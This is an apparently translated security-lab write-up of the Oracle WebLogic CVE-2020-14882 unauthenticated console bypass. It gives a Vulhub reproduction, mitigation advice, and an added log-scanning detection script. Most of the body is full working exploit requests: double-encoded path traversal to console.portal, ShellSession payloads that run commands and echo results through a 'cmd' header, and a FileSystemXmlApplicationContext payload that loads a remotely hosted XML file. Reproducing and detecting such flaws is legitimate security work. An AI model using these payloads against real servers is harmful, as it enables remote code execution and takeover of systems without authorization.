Cybersecurity leads the era; Mitian lights up the future
![eda84491a04005e66ac04f7a7b903193.png](https://i-blog.csdnimg.cn/blog_migrate/60d60e1073de24344c4028c656cf3d71.png)
0x01 Vulnerability description
On October 30, 2020, it was found that Oracle's latest patch for the CVE-2020-14882 WebLogic code execution vulnerability can be bypassed. The vulnerability is numbered CVE-2020-14882, severity: Critical, CVSS score: 9.8.
A remote attacker can craft a special HTTP request to take over the WebLogic Server Console without authentication and execute arbitrary code in the WebLogic Server Console.
0x02 Affected versions
Oracle WebLogic Server 10.3.6.0.0
Oracle WebLogic Server 12.1.3.0.0
Oracle WebLogic Server 12.2.1.3.0
Oracle WebLogic Server 12.2.1.4.0
Oracle WebLogic Server 14.1.1.0.0
0x03 Environment setup and reproduction
Deploy Docker on a virtual machine and use Vulhub to stand up the vulnerable test environment with a single command:
```
docker-compose up -d
```
1. Access the vulnerable environment:
http://192.168.60.130:7001/console/login/LoginForm.jsp
2. During exploitation, construct the payload according to what is needed. Three approaches are commonly used at present:
1. The payload produces no echoed output, but it has executed successfully.
Construct the payload and send it:
```http
GET /console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/yunzui');") HTTP/1.1
Host: 192.168.60.130:7001
Cache-Control: max-age=0
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.60.130:7001/console/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ADMINCONSOLESESSION=-KSLiFfIosk7pDYFYp701K0Svy9__G8yZefB7whwyLGLvkhjKbTD!-355433482
Connection: close
Content-Length: 4
```
Result (screenshot):
Alternatively, verify with a DNSLog platform.
Generated DNS domain: idvek9.dnslog.cn
Construct the payload and send it.
Result (screenshot):
Or use a Python script to exploit the vulnerability.
Result (screenshot):
2. The payload echoes its output.
Submit the payload via GET:
```http
GET /console/css/%25%32%65%25%32%65%25%32%66consolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread();weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork();java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj);String cmd = req.getHeader("cmd");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window")? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\A").next();weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();}currentThread.interrupt();') HTTP/1.1
Host: 192.168.60.130:7001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
cmd: id
Content-Length: 0
```
Executed command: id
Submit the payload via POST:
```http
POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1
Host: 192.168.60.130:7001
cmd: id
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 1258

_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();weblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod("getServletRequest").invoke(obj);String cmd = req.getHeader("cmd");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window")? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if (cmd != null) { String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter("\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req); res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result)); res.getServletOutputStream().flush(); res.getWriter().write("");}executeThread.interrupt();");
```
Executed command: id
3. Build the payload as an XML file and reference it remotely.
Generate a domain on the DNSLog platform:
bq11vi.dnslog.cn
Execute (GET):
```http
GET /console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://192.168.60.1/weblogic.xml") HTTP/1.1
Host: 192.168.60.130:7001
Cache-Control: max-age=0
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.60.130:7001/console/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ADMINCONSOLESESSION=-KSLiFfIosk7pDYFYp701K0Svy9__G8yZefB7whwyLGLvkhjKbTD!-355433482
Connection: close
```
Result (screenshot):
Execute (POST):
```http
POST /console/images/%252E%252E%252Fconsole.portal HTTP/1.1
Host: 192.168.60.130:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-type: application/x-www-form-urlencoded;charset=utf-8
Content-Length: 153
CMD: whoami

_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://192.168.60.1/weblogic.xml")
```
Result (screenshot):
0x04 Mitigation
1. Users are advised to temporarily disable external access to the WebLogic admin console at /console/console.portal.
2. Oracle's Critical Patch Update (CPU) has released a patch for this vulnerability; affected users should download and install it promptly.
Note: Oracle's official patch requires an account licensed for the genuine software; log in to https://support.oracle.com with that account to download the latest patch.
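As a defender-side check to go with the mitigations above, here is an added example (not from the original post or from Oracle) that scans access-log lines for the two indicators this write-up shows: a double-URL-encoded `..` under `/console/` that reaches a `*.portal` resource, and a `handle`/`test_handle` parameter naming the ShellSession or FileSystemXmlApplicationContext gadget class. The common-log-format layout and the sample log lines are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Gadget classes named in the write-up above; one of them in the handle parameter is the strongest indicator.
GADGET_CLASSES = ("com.tangosol.coherence.mvel2.sh.ShellSession",
                  "com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext")
# Common-log-format line: client, method, target, status (assumed log layout).
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')


def full_decode(s):
    # Percent-decode until stable, so %252e and %25%32%65 both end up as '.'.
    while (decoded := unquote(s)) != s:
        s = decoded
    return s


def classify_request(target):
    """Return the indicator names that fire for one request target."""
    findings = []
    parts = urlsplit(full_decode(target))
    segments = parts.path.split("/")
    # Rule 1: a '..' segment under /console/ that lands on a *.portal resource (the
    # auth-bypass step). Fires for GET and POST alike, even when the payload travels
    # in a POST body that the access log does not record.
    if len(segments) > 2 and segments[1] == "console" and ".." in segments \
            and parts.path.endswith(".portal"):
        findings.append("console_traversal_to_portal")
    # Rule 2: a handle/test_handle query value that names one of the gadget classes.
    qs = parse_qs(parts.query, keep_blank_values=True)
    for key in ("handle", "test_handle"):
        if any(cls in v for v in qs.get(key, []) for cls in GADGET_CLASSES):
            findings.append("gadget_class_in_" + key)
    return findings


def scan_log(lines):
    """Return (client, method, findings) for every log line that triggers a rule."""
    hits = []
    for m in filter(None, map(LOG_RE.match, lines)):
        client, method, target, _status = m.groups()
        findings = classify_request(target)
        if findings:
            hits.append((client, method, findings))
    return hits


# Constructed sample access-log lines (not taken from the original post).
SAMPLE_LOG = [
    '10.0.0.5 - - [30/Oct/2020:10:00:01 +0800] "GET /console/login/LoginForm.jsp HTTP/1.1" 200',
    '10.0.0.9 - - [30/Oct/2020:10:00:02 +0800] "GET /console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22x%22) HTTP/1.1" 200',
    '10.0.0.9 - - [30/Oct/2020:10:00:03 +0800] "GET /console/css/%25%32%65%25%32%65%25%32%66consolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession(%27x%27) HTTP/1.1" 200',
    '10.0.0.9 - - [30/Oct/2020:10:00:04 +0800] "POST /console/images/%252E%252E%252Fconsole.portal HTTP/1.1" 200',
]
```

Because the POST variants carry the handle in the request body, an access log shows only the traversal for them, so alert on rule 1 by itself rather than requiring both indicators.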
0x05 Reference links
https://www.safedog.cn/news.html?id=4533
http://blog.nsfocus.net/weblogic-console-http-1028/
https://leaderzhang.com/
Where the wind stirs, Mitian's rain is sure to fall!
Mitian Security Lab